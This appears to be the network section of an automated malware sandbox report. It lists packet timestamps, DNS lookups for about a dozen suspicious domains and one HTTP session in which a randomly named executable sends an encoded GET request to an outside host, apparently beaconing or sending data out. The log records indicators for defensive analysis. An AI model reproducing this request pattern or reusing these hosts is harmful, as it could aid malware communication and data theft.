                                                                                              Dec 3, 2023 16:27:18.549979925 CET4975980192.168.2.437.97.254.27
                                                                                              Dec 3, 2023 16:27:18.550590038 CET4975980192.168.2.437.97.254.27
                                                                                              Dec 3, 2023 16:27:18.737046003 CET804975937.97.254.27192.168.2.4
                                                                                              Dec 3, 2023 16:27:18.737061024 CET804975937.97.254.27192.168.2.4
                                                                                              Dec 3, 2023 16:27:18.737071991 CET804975937.97.254.27192.168.2.4
                                                                                              Dec 3, 2023 16:27:18.737086058 CET804975937.97.254.27192.168.2.4
                                                                                              Dec 3, 2023 16:27:18.737098932 CET804975937.97.254.27192.168.2.4
                                                                                              Dec 3, 2023 16:27:18.737261057 CET4975980192.168.2.437.97.254.27
                                                                                              Dec 3, 2023 16:27:20.052546978 CET4975980192.168.2.437.97.254.27
                                                                                              Dec 3, 2023 16:27:21.072021008 CET4976080192.168.2.437.97.254.27
                                                                                              Dec 3, 2023 16:27:21.256609917 CET804976037.97.254.27192.168.2.4
                                                                                              Dec 3, 2023 16:27:21.256726027 CET4976080192.168.2.437.97.254.27
                                                                                              Dec 3, 2023 16:27:21.256906033 CET4976080192.168.2.437.97.254.27
                                                                                              Dec 3, 2023 16:27:21.443629026 CET804976037.97.254.27192.168.2.4
                                                                                              Dec 3, 2023 16:27:21.443692923 CET804976037.97.254.27192.168.2.4
                                                                                              Dec 3, 2023 16:27:21.443732977 CET804976037.97.254.27192.168.2.4
                                                                                              Dec 3, 2023 16:27:21.443762064 CET4976080192.168.2.437.97.254.27
                                                                                              Dec 3, 2023 16:27:21.443772078 CET804976037.97.254.27192.168.2.4
                                                                                              Dec 3, 2023 16:27:21.443813086 CET804976037.97.254.27192.168.2.4
                                                                                              Dec 3, 2023 16:27:21.443836927 CET4976080192.168.2.437.97.254.27
                                                                                              Dec 3, 2023 16:27:21.443851948 CET804976037.97.254.27192.168.2.4
                                                                                              Dec 3, 2023 16:27:21.443892002 CET804976037.97.254.27192.168.2.4
                                                                                              Dec 3, 2023 16:27:21.443905115 CET4976080192.168.2.437.97.254.27
                                                                                              Dec 3, 2023 16:27:21.443933010 CET804976037.97.254.27192.168.2.4
                                                                                              Dec 3, 2023 16:27:21.443989038 CET4976080192.168.2.437.97.254.27
                                                                                              Dec 3, 2023 16:27:21.443994045 CET804976037.97.254.27192.168.2.4
                                                                                              Dec 3, 2023 16:27:21.444034100 CET804976037.97.254.27192.168.2.4
                                                                                              Dec 3, 2023 16:27:21.444083929 CET4976080192.168.2.437.97.254.27
                                                                                              Dec 3, 2023 16:27:21.628475904 CET804976037.97.254.27192.168.2.4
                                                                                              Dec 3, 2023 16:27:21.628495932 CET804976037.97.254.27192.168.2.4
                                                                                              Dec 3, 2023 16:27:21.628509045 CET804976037.97.254.27192.168.2.4
                                                                                              Dec 3, 2023 16:27:21.628521919 CET804976037.97.254.27192.168.2.4
                                                                                              Dec 3, 2023 16:27:21.628549099 CET804976037.97.254.27192.168.2.4
                                                                                              Dec 3, 2023 16:27:21.628567934 CET4976080192.168.2.437.97.254.27
                                                                                              Dec 3, 2023 16:27:21.628577948 CET804976037.97.254.27192.168.2.4
                                                                                              Dec 3, 2023 16:27:21.628597975 CET804976037.97.254.27192.168.2.4
                                                                                              Dec 3, 2023 16:27:21.628622055 CET4976080192.168.2.437.97.254.27
                                                                                              Dec 3, 2023 16:27:21.628632069 CET804976037.97.254.27192.168.2.4
                                                                                              Dec 3, 2023 16:27:21.628648043 CET804976037.97.254.27192.168.2.4
                                                                                              Dec 3, 2023 16:27:21.628700972 CET4976080192.168.2.437.97.254.27
                                                                                              Dec 3, 2023 16:27:21.628700972 CET4976080192.168.2.437.97.254.27
                                                                                              Dec 3, 2023 16:27:21.628717899 CET804976037.97.254.27192.168.2.4
                                                                                              Dec 3, 2023 16:27:21.628736973 CET804976037.97.254.27192.168.2.4
                                                                                              Dec 3, 2023 16:27:21.628766060 CET804976037.97.254.27192.168.2.4
                                                                                              Dec 3, 2023 16:27:21.628767967 CET4976080192.168.2.437.97.254.27
                                                                                              Dec 3, 2023 16:27:21.628779888 CET804976037.97.254.27192.168.2.4
                                                                                              Dec 3, 2023 16:27:21.628787041 CET804976037.97.254.27192.168.2.4
                                                                                              Dec 3, 2023 16:27:21.628806114 CET804976037.97.254.27192.168.2.4
                                                                                              Dec 3, 2023 16:27:21.628859997 CET4976080192.168.2.437.97.254.27
                                                                                              Dec 3, 2023 16:27:21.628886938 CET804976037.97.254.27192.168.2.4
                                                                                              Dec 3, 2023 16:27:21.628902912 CET804976037.97.254.27192.168.2.4
                                                                                              Dec 3, 2023 16:27:21.628935099 CET804976037.97.254.27192.168.2.4
                                                                                              Dec 3, 2023 16:27:21.628957987 CET4976080192.168.2.437.97.254.27
                                                                                              Dec 3, 2023 16:27:21.628984928 CET4976080192.168.2.437.97.254.27
                                                                                              Dec 3, 2023 16:27:21.628988981 CET804976037.97.254.27192.168.2.4
                                                                                              Dec 3, 2023 16:27:21.629024982 CET804976037.97.254.27192.168.2.4
                                                                                              Dec 3, 2023 16:27:21.629076004 CET4976080192.168.2.437.97.254.27
                                                                                              Dec 3, 2023 16:27:21.812984943 CET804976037.97.254.27192.168.2.4
                                                                                              Dec 3, 2023 16:27:21.813014984 CET804976037.97.254.27192.168.2.4
                                                                                              Dec 3, 2023 16:27:21.813028097 CET804976037.97.254.27192.168.2.4
                                                                                              Dec 3, 2023 16:27:21.813045025 CET804976037.97.254.27192.168.2.4
                                                                                              Dec 3, 2023 16:27:21.813060999 CET804976037.97.254.27192.168.2.4
                                                                                              Dec 3, 2023 16:27:21.813076019 CET804976037.97.254.27192.168.2.4
                                                                                              Dec 3, 2023 16:27:21.813090086 CET804976037.97.254.27192.168.2.4
                                                                                              Dec 3, 2023 16:27:21.813105106 CET804976037.97.254.27192.168.2.4
                                                                                              Dec 3, 2023 16:27:21.813124895 CET4976080192.168.2.437.97.254.27
                                                                                              Dec 3, 2023 16:27:21.813218117 CET4976080192.168.2.437.97.254.27
                                                                                              Dec 3, 2023 16:27:21.813218117 CET4976080192.168.2.437.97.254.27
                                                                                              Dec 3, 2023 16:27:21.813263893 CET804976037.97.254.27192.168.2.4
                                                                                              Dec 3, 2023 16:27:21.813581944 CET804976037.97.254.27192.168.2.4
                                                                                              Dec 3, 2023 16:27:21.813595057 CET804976037.97.254.27192.168.2.4
                                                                                              Dec 3, 2023 16:27:21.813607931 CET804976037.97.254.27192.168.2.4
                                                                                              Dec 3, 2023 16:27:21.813621998 CET804976037.97.254.27192.168.2.4
                                                                                              Dec 3, 2023 16:27:21.813637018 CET804976037.97.254.27192.168.2.4
                                                                                              Dec 3, 2023 16:27:21.813637972 CET4976080192.168.2.437.97.254.27
                                                                                              Dec 3, 2023 16:27:21.813652992 CET804976037.97.254.27192.168.2.4
                                                                                              Dec 3, 2023 16:27:21.813657999 CET4976080192.168.2.437.97.254.27
                                                                                              Dec 3, 2023 16:27:21.813668013 CET804976037.97.254.27192.168.2.4
                                                                                              Dec 3, 2023 16:27:21.813682079 CET804976037.97.254.27192.168.2.4
                                                                                              Dec 3, 2023 16:27:21.813693047 CET4976080192.168.2.437.97.254.27
                                                                                              Dec 3, 2023 16:27:21.813699007 CET804976037.97.254.27192.168.2.4
                                                                                              Dec 3, 2023 16:27:21.813714027 CET804976037.97.254.27192.168.2.4
                                                                                              Dec 3, 2023 16:27:21.813730001 CET804976037.97.254.27192.168.2.4
                                                                                              Dec 3, 2023 16:27:21.813733101 CET4976080192.168.2.437.97.254.27
                                                                                              Dec 3, 2023 16:27:21.813760042 CET804976037.97.254.27192.168.2.4
                                                                                              Dec 3, 2023 16:27:21.813791990 CET4976080192.168.2.437.97.254.27
                                                                                              Dec 3, 2023 16:27:21.813791990 CET4976080192.168.2.437.97.254.27
                                                                                              Dec 3, 2023 16:27:21.813877106 CET4976080192.168.2.437.97.254.27
                                                                                              Dec 3, 2023 16:27:21.814050913 CET4976080192.168.2.437.97.254.27
                                                                                              Dec 3, 2023 16:27:21.998322964 CET804976037.97.254.27192.168.2.4
                                                                                              Dec 3, 2023 16:27:35.858695030 CET4976180192.168.2.4172.67.184.73
                                                                                              Dec 3, 2023 16:27:35.986983061 CET8049761172.67.184.73192.168.2.4
                                                                                              Dec 3, 2023 16:27:35.987143993 CET4976180192.168.2.4172.67.184.73
                                                                                              Dec 3, 2023 16:27:35.987390995 CET4976180192.168.2.4172.67.184.73
                                                                                              Dec 3, 2023 16:27:36.115530014 CET8049761172.67.184.73192.168.2.4
                                                                                              Dec 3, 2023 16:27:37.489828110 CET4976180192.168.2.4172.67.184.73
                                                                                              Dec 3, 2023 16:27:37.618729115 CET8049761172.67.184.73192.168.2.4
                                                                                              Dec 3, 2023 16:27:37.618849039 CET4976180192.168.2.4172.67.184.73
                                                                                              Dec 3, 2023 16:27:38.505799055 CET4976280192.168.2.4172.67.184.73
                                                                                              Dec 3, 2023 16:27:38.635988951 CET8049762172.67.184.73192.168.2.4
                                                                                              Dec 3, 2023 16:27:38.636136055 CET4976280192.168.2.4172.67.184.73
                                                                                              Dec 3, 2023 16:27:38.636346102 CET4976280192.168.2.4172.67.184.73
                                                                                              Dec 3, 2023 16:27:38.766172886 CET8049762172.67.184.73192.168.2.4
                                                                                              Dec 3, 2023 16:27:40.146105051 CET4976280192.168.2.4172.67.184.73
                                                                                              Dec 3, 2023 16:27:40.277419090 CET8049762172.67.184.73192.168.2.4
                                                                                              Dec 3, 2023 16:27:40.277556896 CET4976280192.168.2.4172.67.184.73
                                                                                              Dec 3, 2023 16:27:41.162174940 CET4976380192.168.2.4172.67.184.73
                                                                                              Dec 3, 2023 16:27:41.290873051 CET8049763172.67.184.73192.168.2.4
                                                                                              Dec 3, 2023 16:27:41.291105986 CET4976380192.168.2.4172.67.184.73
                                                                                              Dec 3, 2023 16:27:41.291620016 CET4976380192.168.2.4172.67.184.73
                                                                                              Dec 3, 2023 16:27:41.420051098 CET8049763172.67.184.73192.168.2.4
                                                                                              Dec 3, 2023 16:27:41.420075893 CET8049763172.67.184.73192.168.2.4
                                                                                              Dec 3, 2023 16:27:41.420093060 CET8049763172.67.184.73192.168.2.4
                                                                                              Dec 3, 2023 16:27:41.420106888 CET8049763172.67.184.73192.168.2.4
                                                                                              Dec 3, 2023 16:27:41.420123100 CET8049763172.67.184.73192.168.2.4
                                                                                              Dec 3, 2023 16:27:41.420137882 CET8049763172.67.184.73192.168.2.4
                                                                                              Dec 3, 2023 16:27:41.420151949 CET8049763172.67.184.73192.168.2.4
                                                                                              Dec 3, 2023 16:27:42.802535057 CET4976380192.168.2.4172.67.184.73
                                                                                              Dec 3, 2023 16:27:42.931847095 CET8049763172.67.184.73192.168.2.4
                                                                                              Dec 3, 2023 16:27:42.931967020 CET4976380192.168.2.4172.67.184.73
                                                                                              Dec 3, 2023 16:27:43.818543911 CET4976480192.168.2.4172.67.184.73
                                                                                              Dec 3, 2023 16:27:43.947432041 CET8049764172.67.184.73192.168.2.4
                                                                                              Dec 3, 2023 16:27:43.947551012 CET4976480192.168.2.4172.67.184.73
                                                                                              Dec 3, 2023 16:27:43.947745085 CET4976480192.168.2.4172.67.184.73
                                                                                              Dec 3, 2023 16:27:44.076369047 CET8049764172.67.184.73192.168.2.4
                                                                                              Dec 3, 2023 16:28:15.077565908 CET8049764172.67.184.73192.168.2.4
                                                                                              Dec 3, 2023 16:28:15.078263044 CET8049764172.67.184.73192.168.2.4
                                                                                              Dec 3, 2023 16:28:15.078392982 CET4976480192.168.2.4172.67.184.73
                                                                                              Dec 3, 2023 16:28:15.078444004 CET4976480192.168.2.4172.67.184.73
                                                                                              Dec 3, 2023 16:28:15.207326889 CET8049764172.67.184.73192.168.2.4
                                                                                              Dec 3, 2023 16:28:20.693662882 CET4976580192.168.2.4202.172.28.202
                                                                                              Dec 3, 2023 16:28:20.956363916 CET8049765202.172.28.202192.168.2.4
                                                                                              Dec 3, 2023 16:28:20.956512928 CET4976580192.168.2.4202.172.28.202
                                                                                              Dec 3, 2023 16:28:20.956779003 CET4976580192.168.2.4202.172.28.202
                                                                                              Dec 3, 2023 16:28:21.220112085 CET8049765202.172.28.202192.168.2.4
                                                                                              Dec 3, 2023 16:28:21.231065989 CET8049765202.172.28.202192.168.2.4
                                                                                              Dec 3, 2023 16:28:21.286576033 CET4976580192.168.2.4202.172.28.202
                                                                                              Dec 3, 2023 16:28:21.973612070 CET8049765202.172.28.202192.168.2.4
                                                                                              Dec 3, 2023 16:28:21.973670006 CET4976580192.168.2.4202.172.28.202
                                                                                              Dec 3, 2023 16:28:22.458705902 CET4976580192.168.2.4202.172.28.202
                                                                                              Dec 3, 2023 16:28:23.475131035 CET4976680192.168.2.4202.172.28.202
                                                                                              Dec 3, 2023 16:28:23.733949900 CET8049766202.172.28.202192.168.2.4
                                                                                              Dec 3, 2023 16:28:23.734122038 CET4976680192.168.2.4202.172.28.202
                                                                                              Dec 3, 2023 16:28:23.734517097 CET4976680192.168.2.4202.172.28.202
                                                                                              Dec 3, 2023 16:28:23.993860006 CET8049766202.172.28.202192.168.2.4
                                                                                              Dec 3, 2023 16:28:24.036691904 CET4976680192.168.2.4202.172.28.202
                                                                                              Dec 3, 2023 16:28:24.725339890 CET8049766202.172.28.202192.168.2.4
                                                                                              Dec 3, 2023 16:28:24.725435019 CET4976680192.168.2.4202.172.28.202
                                                                                              Dec 3, 2023 16:28:25.239866972 CET4976680192.168.2.4202.172.28.202
                                                                                              Dec 3, 2023 16:28:26.255770922 CET4976780192.168.2.4202.172.28.202
                                                                                              Dec 3, 2023 16:28:26.515265942 CET8049767202.172.28.202192.168.2.4
                                                                                              Dec 3, 2023 16:28:26.515476942 CET4976780192.168.2.4202.172.28.202
                                                                                              Dec 3, 2023 16:28:26.515870094 CET4976780192.168.2.4202.172.28.202
                                                                                              Dec 3, 2023 16:28:26.775237083 CET8049767202.172.28.202192.168.2.4
                                                                                              Dec 3, 2023 16:28:26.775258064 CET8049767202.172.28.202192.168.2.4
                                                                                              Dec 3, 2023 16:28:26.775269985 CET8049767202.172.28.202192.168.2.4
                                                                                              Dec 3, 2023 16:28:27.006155968 CET8049767202.172.28.202192.168.2.4
                                                                                              Dec 3, 2023 16:28:27.052280903 CET4976780192.168.2.4202.172.28.202
                                                                                              Dec 3, 2023 16:28:27.733210087 CET8049767202.172.28.202192.168.2.4
                                                                                              Dec 3, 2023 16:28:27.733299971 CET4976780192.168.2.4202.172.28.202
                                                                                              Dec 3, 2023 16:28:28.020998001 CET4976780192.168.2.4202.172.28.202
                                                                                              Dec 3, 2023 16:28:29.037533998 CET4976880192.168.2.4202.172.28.202
                                                                                              Dec 3, 2023 16:28:29.296514988 CET8049768202.172.28.202192.168.2.4
                                                                                              Dec 3, 2023 16:28:29.296731949 CET4976880192.168.2.4202.172.28.202
                                                                                              Dec 3, 2023 16:28:29.296840906 CET4976880192.168.2.4202.172.28.202
                                                                                              Dec 3, 2023 16:28:29.555701971 CET8049768202.172.28.202192.168.2.4
                                                                                              Dec 3, 2023 16:28:29.556153059 CET8049768202.172.28.202192.168.2.4
                                                                                              Dec 3, 2023 16:28:29.599101067 CET4976880192.168.2.4202.172.28.202
                                                                                              Dec 3, 2023 16:28:30.289371014 CET8049768202.172.28.202192.168.2.4
                                                                                              Dec 3, 2023 16:28:30.289505959 CET4976880192.168.2.4202.172.28.202
                                                                                              Dec 3, 2023 16:28:30.289706945 CET4976880192.168.2.4202.172.28.202
                                                                                              Dec 3, 2023 16:28:30.548393965 CET8049768202.172.28.202192.168.2.4
                                                                                              Dec 3, 2023 16:28:36.202440023 CET4976980192.168.2.443.154.179.176
                                                                                              Dec 3, 2023 16:28:37.208607912 CET4976980192.168.2.443.154.179.176
                                                                                              Dec 3, 2023 16:28:39.224081993 CET4976980192.168.2.443.154.179.176
                                                                                              Dec 3, 2023 16:28:43.239685059 CET4976980192.168.2.443.154.179.176
                                                                                              Dec 3, 2023 16:28:51.396053076 CET4976980192.168.2.443.154.179.176
                                                                                              Dec 3, 2023 16:28:58.428813934 CET4976980192.168.2.443.154.179.176
                                                                                              Dec 3, 2023 16:28:59.442796946 CET4976980192.168.2.443.154.179.176
                                                                                              Dec 3, 2023 16:29:01.442838907 CET4976980192.168.2.443.154.179.176
                                                                                              Dec 3, 2023 16:29:05.458448887 CET4976980192.168.2.443.154.179.176
                                                                                              Dec 3, 2023 16:29:13.458455086 CET4976980192.168.2.443.154.179.176
                                                                                              Dec 3, 2023 16:29:20.478786945 CET4976980192.168.2.443.154.179.176
                                                                                              Dec 3, 2023 16:29:21.489751101 CET4976980192.168.2.443.154.179.176
                                                                                              Dec 3, 2023 16:29:23.540615082 CET4976980192.168.2.443.154.179.176

                                                                                              UDP Packets

                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                              Dec 3, 2023 16:25:44.019479036 CET4941453192.168.2.41.1.1.1
                                                                                              Dec 3, 2023 16:25:44.209698915 CET53494141.1.1.1192.168.2.4
                                                                                              Dec 3, 2023 16:26:00.225182056 CET6207653192.168.2.41.1.1.1
                                                                                              Dec 3, 2023 16:26:00.410727978 CET53620761.1.1.1192.168.2.4
                                                                                              Dec 3, 2023 16:26:08.460575104 CET6294453192.168.2.41.1.1.1
                                                                                              Dec 3, 2023 16:26:08.692002058 CET53629441.1.1.1192.168.2.4
                                                                                              Dec 3, 2023 16:26:21.772303104 CET5766153192.168.2.41.1.1.1
                                                                                              Dec 3, 2023 16:26:21.907979965 CET53576611.1.1.1192.168.2.4
                                                                                              Dec 3, 2023 16:26:30.131525040 CET5526653192.168.2.41.1.1.1
                                                                                              Dec 3, 2023 16:26:30.477791071 CET53552661.1.1.1192.168.2.4
                                                                                              Dec 3, 2023 16:26:44.179333925 CET6139453192.168.2.41.1.1.1
                                                                                              Dec 3, 2023 16:26:44.561160088 CET53613941.1.1.1192.168.2.4
                                                                                              Dec 3, 2023 16:26:58.131499052 CET5590453192.168.2.41.1.1.1
                                                                                              Dec 3, 2023 16:26:58.266987085 CET53559041.1.1.1192.168.2.4
                                                                                              Dec 3, 2023 16:27:12.475166082 CET6379353192.168.2.41.1.1.1
                                                                                              Dec 3, 2023 16:27:12.942491055 CET53637931.1.1.1192.168.2.4
                                                                                              Dec 3, 2023 16:27:26.818763971 CET5175853192.168.2.41.1.1.1
                                                                                              Dec 3, 2023 16:27:27.415332079 CET53517581.1.1.1192.168.2.4
                                                                                              Dec 3, 2023 16:27:35.477665901 CET5987153192.168.2.41.1.1.1
                                                                                              Dec 3, 2023 16:27:35.857436895 CET53598711.1.1.1192.168.2.4
                                                                                              Dec 3, 2023 16:28:20.084345102 CET5157853192.168.2.41.1.1.1
                                                                                              Dec 3, 2023 16:28:20.692142010 CET53515781.1.1.1192.168.2.4
                                                                                              Dec 3, 2023 16:28:35.303936958 CET5013253192.168.2.41.1.1.1
                                                                                              Dec 3, 2023 16:28:36.201072931 CET53501321.1.1.1192.168.2.4

                                                                                              DNS Queries

                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                              Dec 3, 2023 16:25:44.019479036 CET192.168.2.41.1.1.10x9ba3Standard query (0)www.rssnewscast.comA (IP address)IN (0x0001)false
                                                                                              Dec 3, 2023 16:26:00.225182056 CET192.168.2.41.1.1.10x1756Standard query (0)www.tongtu150.clickA (IP address)IN (0x0001)false
                                                                                              Dec 3, 2023 16:26:08.460575104 CET192.168.2.41.1.1.10x9a6aStandard query (0)www.quote2bill.comA (IP address)IN (0x0001)false
                                                                                              Dec 3, 2023 16:26:21.772303104 CET192.168.2.41.1.1.10x5f3bStandard query (0)www.kateandrae.comA (IP address)IN (0x0001)false
                                                                                              Dec 3, 2023 16:26:30.131525040 CET192.168.2.41.1.1.10x95b6Standard query (0)www.fdissolutions.netA (IP address)IN (0x0001)false
                                                                                              Dec 3, 2023 16:26:44.179333925 CET192.168.2.41.1.1.10xe0a8Standard query (0)www.pay4dance.xyzA (IP address)IN (0x0001)false
                                                                                              Dec 3, 2023 16:26:58.131499052 CET192.168.2.41.1.1.10x7949Standard query (0)www.busan3-200.comA (IP address)IN (0x0001)false
                                                                                              Dec 3, 2023 16:27:12.475166082 CET192.168.2.41.1.1.10x9e80Standard query (0)www.wrautomotive.onlineA (IP address)IN (0x0001)false
                                                                                              Dec 3, 2023 16:27:26.818763971 CET192.168.2.41.1.1.10xba14Standard query (0)www.pace-drive-coupons.comA (IP address)IN (0x0001)false
                                                                                              Dec 3, 2023 16:27:35.477665901 CET192.168.2.41.1.1.10x4fbdStandard query (0)www.poria.linkA (IP address)IN (0x0001)false
                                                                                              Dec 3, 2023 16:28:20.084345102 CET192.168.2.41.1.1.10x5053Standard query (0)www.kasegitai.tokyoA (IP address)IN (0x0001)false
                                                                                              Dec 3, 2023 16:28:35.303936958 CET192.168.2.41.1.1.10x85f5Standard query (0)www.waimaier2.storeA (IP address)IN (0x0001)false

                                                                                              DNS Answers

                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                              Dec 3, 2023 16:25:44.209698915 CET1.1.1.1192.168.2.40x9ba3No error (0)www.rssnewscast.com91.195.240.94A (IP address)IN (0x0001)false
                                                                                              Dec 3, 2023 16:26:00.410727978 CET1.1.1.1192.168.2.40x1756Server failure (2)www.tongtu150.clicknonenoneA (IP address)IN (0x0001)false
                                                                                              Dec 3, 2023 16:26:08.692002058 CET1.1.1.1192.168.2.40x9a6aNo error (0)www.quote2bill.com185.151.30.138A (IP address)IN (0x0001)false
                                                                                              Dec 3, 2023 16:26:21.907979965 CET1.1.1.1192.168.2.40x5f3bName error (3)www.kateandrae.comnonenoneA (IP address)IN (0x0001)false
                                                                                              Dec 3, 2023 16:26:30.477791071 CET1.1.1.1192.168.2.40x95b6No error (0)www.fdissolutions.net109.68.33.25A (IP address)IN (0x0001)false
                                                                                              Dec 3, 2023 16:26:44.561160088 CET1.1.1.1192.168.2.40xe0a8No error (0)www.pay4dance.xyz66.29.155.54A (IP address)IN (0x0001)false
                                                                                              Dec 3, 2023 16:26:58.266987085 CET1.1.1.1192.168.2.40x7949No error (0)www.busan3-200.combusan3-200.comCNAME (Canonical name)IN (0x0001)false
                                                                                              Dec 3, 2023 16:26:58.266987085 CET1.1.1.1192.168.2.40x7949No error (0)busan3-200.com52.68.224.126A (IP address)IN (0x0001)false
                                                                                              Dec 3, 2023 16:27:12.942491055 CET1.1.1.1192.168.2.40x9e80No error (0)www.wrautomotive.onlinewrautomotive.onlineCNAME (Canonical name)IN (0x0001)false
                                                                                              Dec 3, 2023 16:27:12.942491055 CET1.1.1.1192.168.2.40x9e80No error (0)wrautomotive.online37.97.254.27A (IP address)IN (0x0001)false
                                                                                              Dec 3, 2023 16:27:27.415332079 CET1.1.1.1192.168.2.40xba14Server failure (2)www.pace-drive-coupons.comnonenoneA (IP address)IN (0x0001)false
                                                                                              Dec 3, 2023 16:27:35.857436895 CET1.1.1.1192.168.2.40x4fbdNo error (0)www.poria.link172.67.184.73A (IP address)IN (0x0001)false
                                                                                              Dec 3, 2023 16:27:35.857436895 CET1.1.1.1192.168.2.40x4fbdNo error (0)www.poria.link104.21.18.253A (IP address)IN (0x0001)false
                                                                                              Dec 3, 2023 16:28:20.692142010 CET1.1.1.1192.168.2.40x5053No error (0)www.kasegitai.tokyo202.172.28.202A (IP address)IN (0x0001)false
                                                                                              Dec 3, 2023 16:28:36.201072931 CET1.1.1.1192.168.2.40x85f5No error (0)www.waimaier2.store43.154.179.176A (IP address)IN (0x0001)false

                                                                                              HTTP Request Dependency Graph

                                                                                              • www.rssnewscast.com
                                                                                              • www.quote2bill.com
                                                                                              • www.fdissolutions.net
                                                                                              • www.pay4dance.xyz
                                                                                              • www.busan3-200.com
                                                                                              • www.wrautomotive.online
                                                                                              • www.poria.link
                                                                                              • www.kasegitai.tokyo

                                                                                              HTTP Packets

                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              0192.168.2.44973991.195.240.94802492C:\Program Files (x86)\PguDoaZJsfFLgmOhBUDuBYdPQBTjzoMwDyDCydphyRQPlASyww\MxIFbOJlQLdXkFqAx.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Dec 3, 2023 16:25:44.407182932 CET462OUTGET /fdo5/?fXUX=ShJ8DFcXvtj84pw&540H2x=65uPmj+z4VpNJqA9pxY4t334WX7Mhk7tiYzSNqqY5uLzfvAkeCdzENkJlXyLUTYzEELB4+YwfPYf7gdekS/nySqpdkWMB4I85w== HTTP/1.1
                                                                                              Host: www.rssnewscast.com
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                              Connection: close
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Dec 3, 2023 16:25:44.657303095 CET1340INHTTP/1.1 200 OK
                                                                                              date: Sun, 03 Dec 2023 15:25:44 GMT
                                                                                              content-type: text/html; charset=UTF-8
                                                                                              transfer-encoding: chunked
                                                                                              vary: Accept-Encoding
                                                                                              x-powered-by: PHP/8.1.17
                                                                                              expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                              cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                              pragma: no-cache
                                                                                              x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_S9gB49a0A3qsAYxMBvt/gnI3Dk0us/DsLWLW5XP9Ehl5W/mpQ6OCEPTktvFYbUNM/rpiGSmKwxBdtIu2K6YWWQ==
                                                                                              last-modified: Sun, 03 Dec 2023 15:25:44 GMT
                                                                                              x-cache-miss-from: parking-698fb476bf-g877q
                                                                                              server: NginX
                                                                                              connection: close
                                                                                              Data Raw: 32 43 45 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 6e 79 6c 57 77 32 76 4c 59 34 68 55 6e 39 77 30 36 7a 51 4b 62 68 4b 42 66 76 6a 46 55 43 73 64 46 6c 62 36 54 64 51 68 78 62 39 52 58 57 58 75 49 34 74 33 31 63 2b 6f 38 66 59 4f 76 2f 73 38 71 31 4c 47 50 67 61 33 44 45 31 4c 2f 74 48 55 34 4c 45 4e 4d 43 41 77 45 41 41 51 3d 3d 5f 53 39 67 42 34 39 61 30 41 33 71 73 41 59 78 4d 42 76 74 2f 67 6e 49 33 44 6b 30 75 73 2f 44 73 4c 57 4c 57 35 58 50 39 45 68 6c 35 57 2f 6d 70 51 36 4f 43 45 50 54 6b 74 76 46 59 62 55 4e 4d 2f 72 70 69 47 53 6d 4b 77 78 42 64 74 49 75 32 4b 36 59 57 57 51 3d 3d 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 72 73 73 6e 65 77 73 63 61 73 74 2e 63 6f 6d 26 6e 62 73 70 3b 2d 26 6e 62 73 70 3b 72 73 73 6e 65 77 73 63 61 73 74 20 52 65 73 6f 75 72 63 65 73 20 61 6e 64 20 49 6e 66 6f 72 6d 61 74 69 6f 6e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 72 73 73 6e 65 77 73 63 61 73 74 2e 63 6f 6d 20 69 73 20 79 6f 75 72 20 66 69 72 73 74 20 61 6e 64 20 62 65 73 74 20 73 6f 75 72 63 65 20 66 6f 72 20 61 6c 6c 20 6f 66 20 74 68 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 79 6f 75 e2 80 99 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 20 46 72 6f 6d 20
                                                                                              Data Ascii: 2CE<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_S9gB49a0A3qsAYxMBvt/gnI3Dk0us/DsLWLW5XP9Ehl5W/mpQ6OCEPTktvFYbUNM/rpiGSmKwxBdtIu2K6YWWQ==><head><meta charset="utf-8"><title>rssnewscast.com&nbsp;-&nbsp;rssnewscast Resources and Information.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="rssnewscast.com is your first and best source for all of the information youre looking for. From
